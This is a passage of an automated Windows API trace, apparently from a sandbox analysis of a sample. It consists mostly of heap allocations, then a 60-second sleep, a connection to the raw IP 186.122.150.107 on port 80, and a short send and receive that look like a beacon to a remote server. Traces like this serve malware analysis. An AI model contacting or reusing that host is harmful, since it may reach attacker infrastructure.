RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2707ef8 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2709b00 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2709038 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270a3a0 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270a5c8 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270a7f0 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2709260 [0229.124] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x2708348 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270b708 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270ac40 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270d760 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270d538 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x270c1d0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730518 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730108 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272e498 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272dc78 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272eec0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272de80 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730310 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730720 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730928 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272f4d8 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272ecb8 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272f6e0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730f40 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2730b30 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x272e088 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x200) returned 0x2731148 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2733ed0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2732d18 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2734e90 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2734c98 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27346b0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27342c0 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2735088 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27348a8 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27344b8 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2732538 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2732f10 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2731968 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2733300 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2733cd8 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x2731b60 [0229.125] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1f0) returned 0x27334f8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271bb20 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271d200 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271bd08 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271d3e8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271e140 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271e328 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271e510 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2718d60 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2718990 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2717a50 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2719500 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2716740 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x2718008 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27187a8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x271a070 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1e0) returned 0x27196e8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e6c98 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e8490 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e9350 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e9528 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e9ab0 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e7048 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e7b58 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e8840 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e9c88 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e7220 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e73f8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e75d0 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e8fa0 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e77a8 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e8a18 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1d0) returned 0x26e8668 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2740ed0 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2741098 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2741428 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2740b40 [0229.126] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x2740d08 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273bb18 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273b068 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273b788 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273b950 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273a228 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273c790 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273a060 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273a5b8 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273c070 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273bce0 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1c0) returned 0x273b3f8 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26ba9b0 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bb400 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26baed8 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bbae0 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bad20 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bb5b8 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bd138 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bc530 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26ba640 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bcf80 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bb770 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bca58 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bbe50 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bc008 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26ba7f8 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1b0) returned 0x26bc378 [0229.127] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269fec0 [0229.128] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x26a0068 [0229.128] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269f9c8 [0229.128] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x269efd8 [0229.128] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2761518 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2761020 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2760488 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2761bb8 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x27611c8 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2761370 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x27607d8 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2760980 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2762258 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x27616c0 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x275f250 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x1a0) returned 0x2762400 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3130 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c2470 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c2938 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c32c8 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c2e00 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3460 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c35f8 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c2f98 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c2ad0 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c4120 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c4780 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3790 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c5440 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3928 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3ac0 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x190) returned 0x26c3c58 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2748ef0 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2747c90 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2748be0 [0229.129] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2749078 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2748128 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2748748 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2747fa0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2749388 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2749200 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x27482b0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x27488d0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2749510 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2748438 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2747980 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2743ab8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x180) returned 0x2743c40 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6dc8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7698 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7988 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6f40 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7df0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6090 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6ad8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7b00 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7230 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6c50 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a73a8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a7f68 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a80e0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6208 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a64f8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x170) returned 0x26a6380 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d15f8 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d03b0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d1b98 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d1fd0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d22a0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d2408 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26d0248 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cb7c0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26ca9b0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cc5d0 [0229.130] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26caf50 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cc030 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cc300 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cb928 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cb220 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x160) returned 0x26cce40 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4fe8 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f47d8 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f3d18 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f5548 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f6568 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4930 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f3e70 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f5298 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4528 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f56a0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f5c00 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f3fc8 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4278 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f5140 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4680 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x150) returned 0x26f4120 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d4d60 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d45b0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d4ad0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d26f0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d5a30 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d7140 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d5658 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d6470 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d6700 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d5cc0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d6848 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d57a0 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d7288 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d6990 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d58e8 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x140) returned 0x26d65b8 [0229.131] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fe240 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fe378 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fdfd0 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fe4b0 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fdc28 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26fdd60 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f6728 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f6860 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f8948 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f6998 [0229.132] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x130) returned 0x26f6ad0 [0229.140] Sleep (dwMilliseconds=0xea60) [0239.145] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x19cf58 | out: lpWSAData=0x19cf58) returned 0 [0239.145] socket (af=2, type=1, protocol=6) returned 0x2bc [0239.146] htons (hostshort=0x50) returned 0x5000 [0239.146] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x19cda0 | out: lpWSAData=0x19cda0) returned 0 [0239.146] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0239.147] gethostbyname (name="186.122.150.107") returned 0x73c408*(h_name="186.122.150.107", h_aliases=0x73c418*=0x0, h_addrtype=2, h_length=4, h_addr_list=0x73c41c*=([0]="186.122.150.107")) [0239.148] inet_ntoa (in=0x6b967aba) returned="186.122.150.107" [0239.148] inet_addr (cp="186.122.150.107") returned 0x6b967aba [0239.148] connect (s=0x2bc, name=0x19d0e8*(sa_family=2, sin_port=0x50, sin_addr="186.122.150.107"), namelen=16) returned 0 [0239.442] send (s=0x2bc, buf=0x19d8f8*, len=203, flags=0) returned 203 [0239.443] recv (in: s=0x2bc, buf=0x19d4f8, len=512, flags=0 | out: buf=0x19d4f8*) returned 512 [0239.718] closesocket (s=0x2bc) returned 0 [0239.719] WSACleanup () returned 0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277a450 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277c280 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277c4a8 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277a678 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277b590 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277c6d0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2779bb0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277a8a0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2779988 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277b7b8 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277c8f8 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x2779760 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277cf70 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x220) returned 0x277aac8 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277acf0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277af18 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277cb20 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277b140 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277bc08 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277d198 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277b368 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277b9e0 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) returned 0x277be30 [0239.719] RtlAllocateHeap (HeapHandle=0x2160000, Flags=0x0, Size=0x210) 